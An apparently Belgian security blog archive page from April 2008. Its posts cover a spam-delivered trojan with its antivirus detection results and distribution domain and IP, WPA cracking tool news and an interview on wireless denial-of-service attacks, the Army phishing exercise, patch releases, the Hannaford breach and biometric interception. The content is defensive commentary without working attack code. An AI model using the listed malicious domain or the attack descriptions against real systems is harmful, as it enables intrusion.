Microsoft 1.3408 2008.04.05 -
NOD32v2 3004 2008.04.05 -
Norman 5.80.02 2008.04.04 -
Panda 9.0.0.4 2008.04.05 Suspicious file
Prevx1 V2 2008.04.05 Covert.Code
Rising 20.38.60.00 2008.04.03 -
Sophos 4.28.0 2008.04.05 Mal/Generic-A
Sunbelt 3.0.1032.0 2008.04.05 -
Symantec 10 2008.04.05 -
TheHacker 6.2.92.265 2008.04.04 -
VBA32 3.12.6.3 2008.03.25 -
VirusBuster 4.3.26:9 2008.04.04 -
Webwasher-Gateway 6.6.2 2008.04.04 Trojan.Crypt.XPACK.Gen

Additional information
File size: 59758 bytes
MD5: 0c208229c50beacc234b8f509ccd79c0

Result 11/32. Not so good as usual. Here is a complete rundown of files and processes it changes.

For each language version, another URL is used:

Www.livejournalfuac.cn/pol_ch/ (Switzerland)
Www.livejournalfuac.cn/pol_lv/ (Latvia)
Www.livejournalfuac.cn/pol_nl/ (Netherlands)
Www.livejournalfuac.cn/pol_fi/ (Finland)

The website resolves to IP Address 58.22.101.116 (58.22.100.0 - 58.22.103.255) hosted in Fuzhou city, fujian provincial network of CNCGROUP in China. I couldn't find any relation with previously known ranges used by the RBN. But I did find out that another IP 58.22.101.236 in the same class C subnet is in the Dshield Database.

Some of the big AV vendors like Microsoft and Symantec are not catching it. A lot of corporation are using these, since they have good central management capabilities but their detection rates seem to be awful. Their only chance is to have a second AV engine on the proxy that hopefully does a better job. Educating users not to follow spam (even the erotic ones) seems to apply here. Also filter out all executable files by default (.exe .com .vbs .cab etc.....).

at 6.4.08

A new version of coWPAtty was released that includes support for OSX, FreeBSD and Linux systems. Also introduced is the ability to perform WPA/WPA2-PSK cracking on networks using IEEE 802.11e QoS data frames. You can grab coWPAtty, check the README and get more information from the coWPAtty page on this site. (kudos to Josh Wright)

Josh has given an interview to Networkworld.com and answers a lot of questions of the users. Here are some of the interesting ones:

Ed: Are standards in the works to address control level security (to prevent DoS and MIM attacks)?

Josh_Wright: There is an IEEE working group developing techniques to mitigate spoofing management frames in wireless networks (IEEE 802.11w), which will mitigate, de-authenticate and disassociate flood attacks. However, this WILL NOT STOP DoS ATTACKS (sorry, I get a little excited about this topic ;). 802.11w will address two popular DoS attacks, but will not address other DoS attacks such as beacon DS Set spoofing where I tell the victims their AP is on channel 255, or triggering Michael Countermeasures, a vulnerability in TKIP, or by performing A-MSDU Block Ack DoS attacks, a vulnerability in 802.11n networks. For more information on wireless attacks, check out www.wve.org.
Alanm: Is WPA2 now considered very secure and we should feel fine using it? Or are there still attacks/vulnerabilities that it's susceptible to?

Josh_Wright: WPA2 provides strong encryption, and specifies strong authentication mechanisms such as PEAP, TTLS and EAP/TLS as well, so it is a strong strategy for organizations. The common problem with these implementations is when people misconfigure client settings for PEAP and TTLS, like I discussed with Brad Antoniewicz from Foundstone at Shmoocon a few weeks ago (slides at www.willhackforsushi.com, the video will be up at shmoocon.org shortly). If PEAP and TTLS aren't configured properly, an attacker can impersonate your RADIUS server and get access to the victim's inner authentication credentials, possibly disclosing the user's password, or giving the attacker access to the user's MS-CHAP challenge response, which is almost as good.
PatrickT: How (if at all) is 802.11n going to change the security picture?

Josh_Wright: 802.11n exposes us in a few new ways: 1. Greater distance in range for wireless AP's, conservatively at 1.5 times the range of 802.11a, liberally at four times the range of 802.11a. 2. Harder for WIDS to monitor. With 802.11n we have 20 MHz and 40 MHz channels, which makes WIDS systems spend less and less time on channel and more time channel hopping, which reduces the chances they'll be able to pick up an attack. 3. Hidden rogues. 802.11n introduces a technology for 802.11n-only devices called Greenfield mode, which makes it impossible for legacy 802.11a/b/g WIDS devices to detect the rogue AP or the user's traffic. 4. New DoS vulnerabilities. The 802.11n specification has two mechanisms for aggregating frames, which has prompted changes in how devices acknowledge transmitted frames. This has opened up DoS vulnerabilities, where an attacker can stop 802.11n devices from accepting any more frames. 5. New drivers, the complexity of 802.11n is largely felt by client devices, and new device drivers have to be written to support the specification and new hardware. With the complexity of 802.11n, this has lead to new driver vulnerabilities, which can be exploited by an attacker.

Read the Full article for the rest.

PS: If you need some wifi cards or antennas, here is an excellent ebay store.

at 6.4.08

The latest video from Hak5 is out. On a sidenote, I also use Yahoo Pipes to power the Belgian Security Blognetwork. See the contents of the show:

In this episode Matt uses PowerGUI to command the new Windows PowerShell, Chris Gerling Helix, an open source forensics toolkit and Darren builds a simple web mashup using Yahoo Pipes. Plus haksnacks including router passwords, uninterrupted file copying, password strength auditing, and Firefox keyword shortcuts. demonstrates
Oh yeah and some bloopers. A lot of bloopers. Actually, pretty much most of the episode is one ongoing blooper. We’re kicking it oldschool Hak5 style. Call it senioritis if you will :).

PS: Hak5 and trust your technolust stickers available for a limited time.

Download

Download MP4

Download Xvid

Download WMV

Watch on Youtube

Running time: 40:00

at 6.4.08

Panda Labs has released their first quarterly report of 2008 about the current Computer Security threats and what users face today in the ever ongoing battle against security threats, ID and Personal Data Theft, viruses, spyware, malware, and others.

Executive Summary:

At 62.16%, Trojans account for most of the malware, implementing scrambling and distribution functions.
Trojans that steal users' personal details through distribution channels provided by spammers continue to increase.
Storm Worm is still active and continues using social engineering techniques to spread massively.
Scrambling, encryption and packaging techniques aimes at making malware detection more difficult are on the rise.
Social engineering techniques that exploit the information published on social networks for identity theft are also increasing.
Its numerous users have made Symbian a target platform for malware creators.

One of the notable things in the document is that we are seeing a return of Master Boot Records exploits; though not with a virus but a rootkit.

From the article (p. 19):

Stealth techniques aimed at carrying out almost-invisible silent infections are evolving.

You can use the F-Secure standalone rootkit scanner Blacklight to scan for MBR infections.

Other topics discussed in the article are: a recap of Storm Worm over the last year, Multi-AV scanners, Web 2.0 attacks, and the latest attacks on mobile phones.

"Quarterly Report Panda Labs (January - March 2008)"

at 5.4.08

Hackers wasn't exactly the most realistic hacker movie with fancy computerscreens and mentioning a lot of cool words. Wargames is a far better movie and a classic. Wargames is war dialing, phone phreaking, social engineering, and lock picking.

It seems Wargames 2 is going down the line of Hackers. It is logging on to an MMOG, after finding a gaming site with Google. Hmm.... let's hope the trailer doesn't give an accurate impression.

"WarGames: The Dead Code stars Matt Lanter as a computer geek named Will Farmer who engages a government super-computer named R.I.P.L.E.Y. and enters in a game of online terrorist-attack simulation (yes, instead of global thermonuclear war from the original movie). But apparently the game is actually part of a sophisticated piece of government spyware designed to find potential terrorists. Homeland Security, now believing Farmer is a terrorist, sets out to apprehend him. And the computer, of course, forgets that it’s just playing a game."

View the trailer at http://www.slashfilm.com/2008/04/01/wargames-2-movie-trailer

user awareness · at 4.4.08

In "Social engineering pentesting against your employees", I mentioned setting up your own phishing attempt against your employees as a user awareness campaign. It also provides realistic results of the percentage of employees who are susceptible against social engineering.

Apparently, the American Army did just that!!!

ALEXANDRIA, Va. (Apr 02, 2008) – More than 10,000 Soldiers, civilians and Family members with military e-mail addresses received an e-mail March 30 promising free tickets to area theme parks, with a link to a Web site that appeared to belong to the Family and Morale, Welfare and Recreation Command.

These e-mails were sent without the knowledge or consent of the Family and Morale, Welfare and Recreation Command (FMWRC) or installation MWR offices. These e-mails were "phishing" emails developed by the Army Computer Emergency Response Team (ACERT) in a Global Computer Network Defense exercise, Bulwark Defender 08 (BD08) to test the defensive posture of the Army LandWarNet.

FMWRC officials were not alerted to the exercise in advance because the unit "limits the number of trusted agents" in phishing exercises of this type, according to ACERT officials.

...

The e-mail and Web site created by ACERT were convincing enough to entice more than 3,000 people to click through, in part because of the use of the MWR web graphics and logo, and in part because patrons are used to receiving similar messages.

"We apologize for any inconvenience or false hope these e-mails may have caused. As users of Army network and information systems, you play an integral role in the Information Assurance and Network Security posture for the Army. As you know, phishing emails are a common method used by Hackers to infiltrate Army networks and systems. Your ability to identify and respond to phishing attempts is paramount to the defense of critical information systems that make up the Army LandWarNet. Soon, you will receive another e-mail from the ACERT that will provide education on how to identify "phishing" attempts as illegitimate.

We appreciate your participation in this exercise. Everyone plays a part in the security of the Army networks and systems. It is important for everyone to know the MWR brand can be trusted, so please forward this email to anyone you may have shared the original "phishing" email with." (Source: www.armyfamiliesonline.org)

Hmmm.... 3.000 out of 10.000 targets. That is 30%!!! If you do a similar exercise, get permission from executive management and work together with HR and Legal. I would like to see more people trying this exercise.

Previous articles:

at 4.4.08

Time to get patching again. It's a nice bunch and especially browser related bugs. Perfect for those drive-by downloads.

Microsoft released their advance notification about this upcoming Patch Tuesday. Looks like system administrator have their work cut out for them: 8 security advisories (5 critical and 3 important), as well as some other non-security patches.

More information is available at http://www.microsoft.com/technet/security/bulletin/ms08-apr.mspx.

Then it's Apple turn again with QuickTime 7.4.5. Apple has released QuickTime 7.4.5 to address multiple vulnerabilities. These vulnerabilities may allow a remote attacker to execute arbitrary code or obtain sensitive information.

More information is available at Apple knowledgebase article HT1241 and you advised to upgrade to Quicktime 7.4.5

Also Opera released a new version of their browser (9.27) that fixes two remotely exploitable vulnerabilities (http://www.opera.com/support/search/view/881/ and http://www.opera.com/support/search/view/882/).

The update can be downloaded from http://www.opera.com/download/.

A severe security vulnerability exists in RealNetworks' RealPlayer software.

The flaw can allow malicious access to user's PC. The flaw can be used by creating an amended RealMedia file and to use that file to cause a buffer overflow on user's PC. So, it is not possible to "attack" your RealPlayer, but if you open a RealMedia file from suspectible website or download one from the Net, it might contain alterations that allow exposing this security hole. An exploit for this vulnerability was posted on milw0rm on the 1st of April and is actively being exploited.

RealNetworks has issued a patch for the problem. Patch can be downloaded from here:
http://www.service.real.com/help/faq/security/040123_player/EN/

Last but not least, Adobe will release an update for Flash in the coming days. This exploit was exposed during the PWN to OWN hack contest during which Vista was hacked. A combination of a vulnerability in flash together with Java, was the downfall of Vista.

So keep an eye on the Adobe advisories. You can use Secunia PSI to detect any other system components that needs patching.

Related articles:

at 4.4.08

The first videos are produced by Microsoft. These “How do I?” videos provide video tutorials about certain issues like “How do I fix SQL Injection?” or “How do I prevent Cross-Site Request Forgery?”. I haven't watched them myself (yet) so this is also a reference for myself to keep track of. Most of them are focussed on .NET technology.

The following video is from VOIPshield. They recently gained some press by announcing the discovery of over 100 security vulnerabilities in systems from Avaya, Cisco and Nortel.

VoIPshield has disclosed all the vulnerabilities to the vendors and has made 44 of the vulnerabilities available at www.voipshield.com/research

So here is the video from VOIPshield:

Bonus: Study: VOIP is in need of security (Source: Darkreading)

at 4.4.08

Just shortly after the breach, the discussions started and the PCI certification was under fire. Although the Hannaford breach was not as severe as the TJX incident but Hannaford WAS PCI certified compared to TJX. So why did the certification did not protect them against hackers?

PCI can give many merchants “a false sense of security,” says John Pironti, Chief Information Risk Strategist at Getronics. He says the bad guys have deep knowledge about how to circumvent security controls specified by PCI, “and are well on the way to working out the others.”

In fact, Pironti says that by stating it is PCI compliant, a merchant can actually give data thieves “a roadmap of the controls which you have in place which they can then circumvent.” (Source: Zero day threat.)

Securosis has his own points and suggestions for fixing the system:

PCI-DSS was established to transfer risk from the credit card companies to the retailers and processors. There is a lot the credit card companies could do to reduce risk on the processing side, but they have instead chosen to push it onto the retailers and processors.
Going back to CardSystems, a large majority of major breaches involve companies that were PCI compliant, including (probably) Hannaford. TJX is an open question. In many cases, the companies involved were certified but found to be non-compliant after the breach, which indicates a severe breakdown in the certification process
No ASV has been dropped from PCI, even after certifying non-compliant companies. There is no accountability in the system.
ASVs are allowed to offer services to the companies they certify, which is a built-in conflict of interest. They should be held to the same standard as financial auditors where the audit function and compliance assistance/services/consulting cannot come from the same auditor.
Many auditors certify compensating controls that are clearly ineffective.
Due to lack of accountability in the system, companies push ASVs for the lowest price possible to achieve “compliance”. This price pressure leads to cheap certification, and the approval of inadequate controls mentioned in point 5. PCI-DSS is moving to a checkbox that doesn’t necessarily reflect any level of security, and the credit card companies are okay with that since they can just later find the company in violation after a breach, yank certification, levy fines, and push all costs to the retailer.

So what actually happened at Hannaford?

The data breach at Hannaford, the US grocery chain, which enabled the theft of info on more than 4.2 million credit card accounts was caused by a sophisticated piece of malware that attackers installed in all the company's retail outlets.

Installed on more than 300 servers in at least six states, the malware was able to intercept credit card data while customers paid for purchases using plastic and transmit the information overseas, The Boston Globe reports. The rogue software was installed on servers in close to 300 different locations, though the company isn't saying how it got there.

The malware lifted "track 2" data stored on the magnetic strip of customers' cards as customers used them at point-of-sale machines. The data includes the card number and expiration date, but not the customer's name. The malware stored records of the purchases in batches and periodically transmitted them to an unidentified offshore internet service provider, according to the company. (Source: TheRegister)

So why not share this information? I would be of tremendous help to similar PCI certified retailers. I saw an interesting quote from Gartner last year which I recently used in a presentation:

By the end of 2007, 75 percent of enterprises will be infected with undetected, financially motivated, targeted malware that evaded their traditional perimeter and host defences. The threat environment is changing — financially motivated, targeted attacks are increasing, and automated malware-generation kits allow simple creation of thousands of variants quickly — but our security processes and technologies haven't kept up. (Zdnet.co.uk)

Related articles:

UPDATED (03/04/2008): Some more details have appeared here and there

Let’s look more closely at the methodology used in the Hannaford case. There are various news reports that depict the management of Hannaford as confused and shocked at the “unique” use of Trojan Horse malware to steal information from them. Trojan software is malware that is disguised as something else as it is installed on a remote computer. It can then be used to steal files, record keystrokes, even take over the computer. Trojan Horses are the simplest way to infiltrate a network. They arrive as email attachments, can masquerade as PowerPoint presentations, and they can be easily modified to avoid detection by any signature based AV program. Trojans such as the Storm Worm are said to infect hundred’s of millions of machines on the Internet. The Haaphrati Trojan was used to steal hundreds of documents from dozens of companies in Israel. A Trojan Horse was implicated in the CardSystems International case. Hardware and software Trojans were used in the Sumitomo Bank heist . And the Chinese Red Army has infamously used Trojan Horses to blanket the world in the most massive case of industrial espionage in history. Any reader of my blog knows of the dangers of custom Trojans.

Lessons learned from the Hannaford case? That retail organizations are being targeted. This attack appears to be almost complete and most likely emanating from overseas. Being a target for attacks means a different different level of security preparedness is required. Firewalls plus AV is not enough. Encryption is required - at rest and in motion. Behavior analysis and alerting systems have to be in place. Not IDS, but something that can detect when authorized insiders have changed their behavior. Investment is required. (Source: networkworld.com)

at 4.4.08

The Usenix Journal login has a new issue.
http://www.usenix.org/publications/login/2008-04/index.html

Most of the articles are only accessible for Usenix members but the following articles are free for everyone:

OPINION
Musings by Rik Farrow

SYSADMIN
IPv6: It's Time to Make the Move by Mark Kosters and Megan Kruse

BOOK REVIEWS
Book Reviews by Elizabeth Zwicky et al.

USENIX NOTES

Open Public Access to All USENIX Conference Proceedings

at 4.4.08

I just got back from 3 days at London. I went to visit the businesscontinuityexpo.co.uk. It was an interesting experience. However I'll be looking forward to the next CCCongress It will be 25C3 (the 25th Chaos Computer Congress) and I really looking forward to a special edition.

The most cool thing is that on the evening of day 2, there was a DC4420 Defcon meeting in London with Jeff Moss as a special guest. Of course I attended the gathering. I learned some interesting stuff and met some cool people. Since we don't have these kind of gatherings in Belgium, I might consider hoping on the Eurostar now and then. Who knows....

What did I learn about business continuity? Well, virtualization is a highly flexible platform to be used in case of a disaster (live migration etc...), the pandemic flu (not just crashing servers) can be a threat to the organization and the BS25999 standard. I also got a lot of free magazines, brochures and other information. Once I get the time to go through them, I'll post some more notes about BCP and DR.

But for now, I have some backlog on reading my feed and blogging.

at 2.4.08

Just kidding. But I did wanted to mention this April 1st Joke from Sophos with their RAPIL product. In our job, we need some humour now and then to make it through the day.

An exciting day in SophosLabs. After long and arduous efforts, we announce our new beta technology offering to defeat the hackers, which we are currently referring to as RAPIL (Recognition and Analysis of Potentially Intruding Lifeforms).

As the following video demonstrates, RAPIL is already producing impressive results:

Apparently, there is even a Flick photogroup for RAPIL beta testers. :-)

at 2.4.08

Nathan McFeters has the details on his blog about the changes to the Computer Misuse Act in England this year. Give it a quick read before moving on. Of course, it's the same story as the ban on security tools in Germany. A lot of the tools that blackhats use, are the same tools that the whitehats use to test their networks. Blackhats are already working in the illegal zone. Making a new or stricter law, won't change anything for them but it will limit our defenses. As we cannot use them without or develop them without doing illegal activities from that point on.
So, have lawmakers gone bonkers???? Are they too much out of touch with the ~~real~~ digital world? Let's hope the Belgian lawmakers will not start thinking: "Germany is doing it, and England is doing it, so we must also start doing this!!!"

pdp aka The Architect from Gnucitizen has also given his opinion (which I find brilliant):

Now, what really makes me worried is that this act wont fix anything. In fact, it will make the situation far worse. And Britain is the next example to follow Germany, which I am sure will be followed by The United States of America very soon, as it seems that they are the initiators of the recent anti-hacker craze.
I am not a politician and I cannot fight with words because that will be pointless as many people before me has done it and they have failed, but I can lead with examples from my experience. One thing that I have learned, helping far too many organizations to put their security perimeter up a notch, is that security through obscurity does not work.
The law cannot prevent the distribution of information. Have we get rid of the piracy problem? No! In fact, the piracy industry is now far welloff then in the past. You can probably notice that every movie or tv show is available online without the need to access bittorrent or any other distribution network. The music industry is much the same. As a result, bands such as Radiohead and Scissor Sisters, I believe, have offered their music for free because free does make an economic sense.

In a similar way, the Computer Misuse Act will make the availability to exploits far much easier then now. People wont stop publishing security information. They will switch the medium. Instead of posting info on personal blogs, they will do that on Wikipedia or any other site that allows anonymous contributions. The distribution of info on the Web is a breeze now-a-days with the existence of things such as RSS, ATOM and aggregation engines. The reach of information and availability of exploits and the fact that there are no opinion makers to shape the thinking of younger generations of information security experts, will make the situation unbearable, not only for those who don’t deserver the punishment but also to companies and organizations who cannot protect themselves.
Security is not a destination. It is a process. We cannot train a monkey to run a scanner. We need people who understand the risk to show us which of our assets are at stake. With that law in place we are actually reverting what we have already built with far too many sacrifices. (Source: Gnucitizen)

Related articles:

at 2.4.08

In "Let's make huge databases of fingerprints or maybe not", we had a critical look at the usage of fingerprints as authentication. Together with the Chaos Computer Club publishing the fingerprints of a high ranking German official, it was becoming a hot topic.
One of the presentations from Blackhat 2008 I didn't look at, was also quite relevant as some readers pointed out:

If you think biometric scans are necessarily secure, think again: A European researcher has built a biometric keylogger that can capture fingerprint or other scans.
The so-called Biologger intercepts biometric data sent between a biometric scanner and its processing server, says Matt Lewis, a researcher with Information Risk Management, who demonstrated the tool and released proof-of-concept source code for it last week at Black Hat Europe in Amsterdam.
“It is the biometric equivalent of a traditional keylogger,” Lewis says. Biologger easily captures the biometric traffic, which then can be taken offline for the attacker to analyze and to find ways to subvert the biometric system, he says, adding that an attacker could use that information to recreate a user’s raw biometric image. (Source: Darkreading)

So this gives us even more food for thought. I still find the whole concept too 1984.

user awareness · at 2.4.08

Of course, any 'event' of importance will be used to lure users into opening and clicking attachments. So educate your peers !!!

The miscreants behind the Storm Worm botnet have taken advantage of April Fools' day in a bid to infect more Windows PCs.

Security firms are warning users to avoid the temptation to click on April Fools' day emails that may redirect them to maliciously constructed websites.

The latest attempt to dupe more gullible users into getting their PCs infected kicked off on Monday with a spam campaign designed to trick recipients into visiting websites under the control of hackers containing executables with names such such as foolsday.exe, Kickme.exe or funny.exe.

So far the miscreants punting the scam haven't even bothered to include exploit code, net security firm F-secure notes. Potential marks are simply invited to download the malware, promoted via a spam mail campaign. (Source: TheRegister)

So whas the campaign succesful? I just had a look at the graphs from Shadowserver and it doesn't seem to be the case. At least for Tueday the first. But March was a very succesful month for botnet herders. I predict that there will be more attempts at using the Olympics as tactic this year.

at 1.4.08

Karim Vaes, posted an interesting blogpost about Biometrics. Biometrics are not bad, just using fingerprints can be a problem. Because you leave them behind everywhere.

And his timing of the post seems to be so bitter sweet on the spot. A few hours later, news of the CCC (Chaos Computer Club) publishing the fingerprint of the German Home Minister started circulating as a protest against biometric data. From the Identity and Privacy blog:

I think it’s a stark reminder that some biometrics- such as a person’s fingerprints- are reasonably easy to get. And, once compromised, the person can’t ring up a help desk and get a new one (like they can passwords).

The current story revolves around Germany’s interior minister, Wolfgang Schauble. He is apparently quite vocal about collecting and using biometrics to fight terrorism, including storing them in ePassports.

In the most recent issue of Die Datenschleuder, activists under the name of Chaos Computer Club (”Europe’s largest hacker group”) printed the image of, what they claim, is the fingerprint of his index finger.

The fingerprint, on a plastic foil that leaves fingerprints when it is pressed against biometric readers, is included in the 4,000 copies of the latest issue of the magazine. Schauble’s fingerprint was said to be captured off a water glass he used last summer while participating in a public discussion at a University in Berlin.

If a person’s fingerprints are “in the wild” then they are a far less reliable way to authenticate the person for his/her whole life. If enough fingerprints are similarly widely available- whether by accident or deliberately- it will be enough to make fingerprinting almost useless.

Attack bandwidth	peak: 100 Mbps, average: 20 Mbps
Attack duration	peak: 30 minutes, average: under 15 minutes
Attack targets	www2.cnn.com, www3.cnn.com, edition.cnn.com

Destinations	www.cnn.com (one of the IPs for this DNS name)
Attacks in past 24 hours	36 attacks measured
Attacks by type	36 TCP SYN floods
Average and max attack duration	330 seconds average (5.5 minutes), 337 second maximum (slightly longer)

Wednesday

Tuesday

Monday

Sunday

Friday

Thursday

Wednesday

Tuesday

Monday

Sunday

Friday

Thursday

Example of SSO Federation

Large enterprise with several separate business units

Between your enterprise and business partners or customers

Between your enterprise and outsourced providers

Wednesday

Tuesday

Monday

Sunday

Saturday

Thursday

Wednesday

Tuesday

Monday

Top Infected ASN for March 2008

Sunday

Download

Saturday

Friday

Wednesday

Tuesday

About this blog

Join us at these events

Me 2.0

Subscribe to this blog

Upcoming Security Events (in Belgium)

Security Database Tools Watch

Security Bloggers Network

digg / security4all / history

Blog Archive